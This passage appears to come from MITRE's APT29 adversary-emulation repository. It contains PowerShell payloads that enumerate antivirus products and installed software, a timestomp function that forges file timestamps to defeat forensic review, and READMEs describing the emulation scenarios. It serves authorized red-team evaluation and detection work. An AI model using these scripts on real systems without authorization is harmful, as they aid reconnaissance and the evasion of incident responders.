$Signature -Name CT32Snapshot -Namespace Kernel32 117 | $result = [Kernel32.CT32Snapshot]::CT32S() 118 | return $result 119 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepTwelve.ps1: -------------------------------------------------------------------------------- 1 | function detectav { 2 | $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct 3 | 4 | $ret = @() 5 | foreach($AntiVirusProduct in $AntiVirusProducts){ 6 | 7 | #Create hash-table for each computer 8 | $ht = @{} 9 | $ht.Name = $AntiVirusProduct.displayName 10 | $ht.'Product GUID' = $AntiVirusProduct.instanceGuid 11 | $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe 12 | $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe 13 | $ht.'Timestamp' = $AntiVirusProduct.timestamp 14 | 15 | 16 | #Create a new object for each computer 17 | $ret += New-Object -TypeName PSObject -Property $ht 18 | } 19 | Return $ret 20 | } 21 | function software { 22 | $comp = $env:ComputerName 23 | $keys = "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall", 24 | "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" 25 | $type = [Microsoft.Win32.RegistryHive]::LocalMachine 26 | $regKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($type, $comp) 27 | $ret = "" 28 | foreach ($key in $keys) { 29 | $a = $regKey.OpenSubKey($key) 30 | $subkeyNames = $a.GetSubKeyNames() 31 | foreach($subkeyName in $subkeyNames) { 32 | $productKey = $a.OpenSubKey($subkeyName) 33 | $productName = $productKey.GetValue("DisplayName") 34 | $productVersion = $productKey.GetValue("DisplayVersion") 35 | $productComments = $productKey.GetValue("Comments") 36 | $out = $productName + " | " + $productVersion + " | " + $productComments + "`n" 37 | $ret += $out 38 | } 39 | } 40 | Return $ret 41 | } -------------------------------------------------------------------------------- 
/adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/timestomp.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/matthewdunwoody/POSHSPY 2 | 3 | function timestomp { 4 | [CmdletBinding()] param ( 5 | [string] $dest 6 | ) 7 | $source = (gci ((gci env:windir).Value + '\system32') | ? { !$_.PSIsContainer } | Where-Object { $_.LastWriteTime -lt "01/01/2013" } | Get-Random | %{ $_.FullName }) 8 | [IO.File]::SetCreationTime($dest, [IO.File]::GetCreationTime($source)) 9 | [IO.File]::SetLastAccessTime($dest, [IO.File]::GetLastAccessTime($source)) 10 | [IO.File]::SetLastWriteTime($dest, [IO.File]::GetLastWriteTime($source)) 11 | } 12 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/README.md: -------------------------------------------------------------------------------- 1 | # Emulation Plan 2 | 3 | Please see the formal [APT29 emulation document](APT29_EmuPlan.pdf), which includes a break-down of the cited intelligence used for each step of this emulation. 4 | 5 | The Evaluations emulation is split into two distinct scenarios (Days 1 and 2) to reflect these differing operational flows and toolkits used by APT29. 6 | 7 | ![APT Operation Flow](APT29_Opflow.png) 8 | 9 | ## Day 1 10 | 11 | Based on `CosmicDuke` [ATT&CK S0050](https://attack.mitre.org/software/S0050/), `MiniDuke` [ATT&CK S0051](https://attack.mitre.org/software/S0051/), `SeaDuke/SeaDaddy` [ATT&CK S0053](https://attack.mitre.org/software/S0053/), `CozyDuke/CozyCar` [ATT&CK S0046](https://attack.mitre.org/software/S0046/), and `HAMMERTOSS` [ATT&CK S0037](https://attack.mitre.org/software/S0037/) 12 | 13 | This scenario begins with a legitimate user clicking on a malicious payload delivered via a “spray and pray” broad spearphishing. campaign. 
The attacker immediately kicks off a “smash-and-grab”, rapid espionage mission, gathering and exfiltrating data. After the initial exfiltration, the attacker realizes the value of the victim and subsequently deploys a stealthier toolkit, changing TTPs and eventually moving laterally through the rest of the environment. The scenario ends with the execution of previously established persistence mechanisms.
PoshC2 was chosen based on its available functionality and similarities to the adversary's malware within the context of this scenario, but alternative red team tooling could be used to accurately execute these and other APT29 behaviors. 24 | 25 | ## Liability / Responsible Usage 26 | 27 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 28 | 29 | ## Notice 30 | 31 | Copyright 2020 The MITRE Corporation 32 | 33 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 34 | 35 | Licensed under the Apache License, Version 2.0 (the "License"); 36 | you may not use this file except in compliance with the License. 37 | You may obtain a copy of the License at 38 | 39 | http://www.apache.org/licenses/LICENSE-2.0 40 | 41 | Unless required by applicable law or agreed to in writing, software 42 | distributed under the License is distributed on an "AS IS" BASIS, 43 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 44 | See the License for the specific language governing permissions and 45 | limitations under the License. 46 | 47 | This project makes use of ATT&CK® 48 | 49 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) -------------------------------------------------------------------------------- /adversary_emulation/APT29/README.md: -------------------------------------------------------------------------------- 1 | *This content has been ported to https://github.com/center-for-threat-informed-defense/adversary_emulation_library as of January 2021. 
This format was preserved in [/Archive](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/apt29/Archive).* 2 | 3 | # APT29 Emulation 4 | 5 | This content was developed as part of the APT29 ATT&CK Evaluations and includes both the resources used to [manually execute the emulation](https://attackevals.mitre-engenuity.org/APT29/scope) as well as a plug-in developed for [CALDERA](https://github.com/mitre/caldera) (2.6.6). 6 | 7 | For more details about the APT29 ATT&CK Evaluations, including results, visit https://attackevals.mitre-engenuity.org/APT29/ 8 | 9 | ## Adversary Overview 10 | 11 | [APT29/The Dukes/Cozy Bear/YTTRIUM](https://attack.mitre.org/groups/G0016/) (hereinafter referred to as just APT29) is a threat group that has been attributed to the Russian government and has operated since at least 2008.[1](https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf) [14](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) This group has been attributed to major breaches targeting U.S. governments/organizations such as the Democratic National Committee, as well as various international ministries and agencies.[15](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [16](https://securelist.com/the-cozyduke-apt/69731/) APT29 has also been known to “cast a wide net” in terms of targeting, seemingly making this group a universal threat. 12 | 13 | In terms of operational tradecraft, APT29 is distinguished by their commitment to stealth and sophisticated implementations of techniques via an arsenal of custom malware. APT29 typically accomplishes goals via custom compiled binaries and alternate (at least at the time) execution methods such as PowerShell and WMI. APT29 has also been known to employ various operational cadences (smash-and-grab vs. 
slow-and-deliberate) depending on the perceived intelligence value and/or infection method of victims. 14 | 15 | ## Liability / Responsible Usage 16 | 17 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 18 | 19 | ## Notice 20 | 21 | Copyright 2020 The MITRE Corporation 22 | 23 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 24 | 25 | Licensed under the Apache License, Version 2.0 (the "License"); 26 | you may not use this file except in compliance with the License. 27 | You may obtain a copy of the License at 28 | 29 | http://www.apache.org/licenses/LICENSE-2.0 30 | 31 | Unless required by applicable law or agreed to in writing, software 32 | distributed under the License is distributed on an "AS IS" BASIS, 33 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 34 | See the License for the specific language governing permissions and 35 | limitations under the License. 36 | 37 | This project makes use of ATT&CK® 38 | 39 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) 40 | --------------------------------------------------------------------------------